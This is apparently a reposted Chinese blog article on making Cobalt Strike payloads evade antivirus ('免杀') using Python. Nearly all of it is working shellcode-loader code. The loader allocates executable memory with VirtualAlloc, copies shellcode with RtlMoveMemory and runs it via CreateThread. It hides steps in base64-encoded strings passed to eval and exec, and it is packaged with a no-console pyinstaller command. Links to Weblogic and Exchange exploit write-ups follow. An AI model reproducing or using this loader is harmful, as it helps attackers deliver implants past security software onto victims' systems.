其他
【超详细 | Python】CS免杀-分离+混淆免杀思路
Editor's Note
nice
The following article is from XG小刚 Author XG小刚
pyinstaller --noconsole --onefile test.py
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
string = '''Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='''
eval(base64.b64decode(string))
a = '''ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64;ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40));buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),buf,ctypes.c_int(len(shellcode)));handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)));ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))'''
exec(a)
【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦